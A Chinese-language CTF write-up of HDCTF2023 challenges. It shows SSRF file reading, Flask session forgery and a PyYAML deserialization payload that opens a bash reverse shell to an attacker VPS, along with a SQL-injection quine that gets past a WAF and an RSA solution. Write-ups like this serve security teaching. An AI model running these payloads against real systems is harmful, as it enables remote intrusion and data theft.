web

yamiyami

当时考虑直接读的/proc/self/environ
读到flag是not_flag
就没考虑过/proc/1/environ了
然后不知道py3URL二次编码的特性,读不到源码,无从下手
做flask算pin码的题做多了,还以为pid是1的就是self,难顶

上面那种是非预期
预期是yaml反序列化

先读源码
/read?url=file:///%25%36%31%25%37%30%25%37%30%25%32%66%25%36%31%25%37%30%25%37%30%25%32%65%25%37%30%25%37%39

#encoding:utf-8
import os
import re, random, uuid
from flask import *
from werkzeug.utils import *
import yaml
from urllib.request import urlopen
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = False
BLACK_LIST=["yaml","YAML","YML","yml","yamiyami"]
app.config['UPLOAD_FOLDER']="/app/uploads"@app.route('/')
def index():session['passport'] = 'YamiYami'return '''Welcome to HDCTF2023 <a href="/read?url=https://baidu.com">Read somethings</a><br>Here is the challenge <a href="/upload">Upload file</a><br>Enjoy it <a href="/pwd">pwd</a>'''
@app.route('/pwd')
def pwd():return str(pwdpath)
@app.route('/read')
def read():try:url = request.args.get('url')m = re.findall('app.*', url, re.IGNORECASE)n = re.findall('flag', url, re.IGNORECASE)if m:return "re.findall('app.*', url, re.IGNORECASE)"if n:return "re.findall('flag', url, re.IGNORECASE)"res = urlopen(url)return res.read()except Exception as ex:print(str(ex))return 'no response'def allowed_file(filename):for blackstr in BLACK_LIST:if blackstr in filename:return Falsereturn True
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():if request.method == 'POST':if 'file' not in request.files:flash('No file part')return redirect(request.url)file = request.files['file']if file.filename == '':return "Empty file"if file and allowed_file(file.filename):filename = secure_filename(file.filename)if not os.path.exists('./uploads/'):os.makedirs('./uploads/')file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))return "upload successfully!"return render_template("index.html")
@app.route('/boogipop')
def load():if session.get("passport")=="Welcome To HDCTF2023":LoadedFile=request.args.get("file")if not os.path.exists(LoadedFile):return "file not exists"with open(LoadedFile) as f:yaml.full_load(f)f.close()return "van you see"else:return "No Auth bro"
if __name__=='__main__':pwdpath = os.popen("pwd").read()app.run(debug=False,host="0.0.0.0")print(app.config['SECRET_KEY'])

在/boogipop路径下可触发反序列化
但是能进语句的条件是passport == Welcome To HDCTF2023
那么我们需要伪造session

这是生成secret key的逻辑
uuid.getnode返回网卡的int值
那么我们去读网卡
/sys/class/net/eth0/address
得到

验证是否伪造成功

成功伪造了session
然后我们构造恶意yaml文件
我这里命名为ac.ac

!!python/object/new:strargs: []state: !!python/tuple- "__import__('os').system('bash -c \"bash -i >& /dev/tcp/vps地址/9000 <&1\"')"- !!python/object/new:staticmethodargs: []state:update: !!python/name:evalitems: !!python/name:list

触发

这里其实就拿到shell了,由于题目环境的问题是读不了flag的,还是得通过/proc/1/environ读

LoginMaster

robots.txt泄露waf

发现是quine查询
payload如下
1'union/**/select/**/replace(replace('1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

Crypto

math_rsa

由题
p² ≡ a mod r
即a是模p的二次剩余
通过sage求解p

r = 145491538843334216714386412684012043545621410855800637571278502175614814648745218194962227539529331856802087217944496965842507972546292280972112841086902373612910345469921148426463042254195665018427080500677258981687116985855921771781242636077989465778056018747012467840003841693555272437071000936268768887299
a = 55964525692779548127584763434439890529728374088765597880759713360575037841170692647451851107865577004136603179246290669488558901413896713187831298964947047118465139235438896930729550228171700578741565927677764309135314910544565108363708736408337172674125506890098872891915897539306377840936658277631020650625
R.<x> = PolynomialRing(Zmod(r))
f = x**2 - a
print(f.roots())

from Crypto.Util.number import *
import gmpy2
n = 14859096721972571275113983218934367817755893152876205380485481243331724183921836088288081702352994668073737901001999266644597320501510110156000004121260529706467596723314403262665291609405901413014268847623323618322794733633701355018297180967414569196496398340411723555826597629318524966741762029358820546567319749619243298957600716201084388836601266780686983787343862081546627427588380349419143512429889606408316907950943872684371787773262968532322073585449855893701828146080616188277162144464353498105939650706920663343245426376506714689749161228876988380824497513873436735960950355105802057279581583149036118078489
r = 145491538843334216714386412684012043545621410855800637571278502175614814648745218194962227539529331856802087217944496965842507972546292280972112841086902373612910345469921148426463042254195665018427080500677258981687116985855921771781242636077989465778056018747012467840003841693555272437071000936268768887299
a = 55964525692779548127584763434439890529728374088765597880759713360575037841170692647451851107865577004136603179246290669488558901413896713187831298964947047118465139235438896930729550228171700578741565927677764309135314910544565108363708736408337172674125506890098872891915897539306377840936658277631020650625
c = 12162333845365222333317364738458290101496436746496440837075952494841057738832092422679700884737328562151621948812616422038905426346860411550178061478808128855882459082137077477841624706988356642870940724988156263550796637806555269282505420720558849717265491643392140727605508756229066139493821648882251876933345101043468528015921111395602873356915520599085461538265894970248065772191748271175288506787110428723281590819815819036931155215189564342305674107662339977581410206210870725691314524812137801739246685784657364132180368529788767503223017329025740936590291109954677092128550252945936759891497673970553062223608
e=65537
p = 135098300162574110032318082604507116145598393187097375349178563291884099917465443655846455456198422625358836544141120445250413758672683505731015242196083913722084539762488109001442453793004455466844129788221721833309756439196036660458760461237225684006072689852654273913614912604470081753828559417535710077291
q = n // p
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e,phi_n)
print(long_to_bytes(pow(c,d,n)).decode())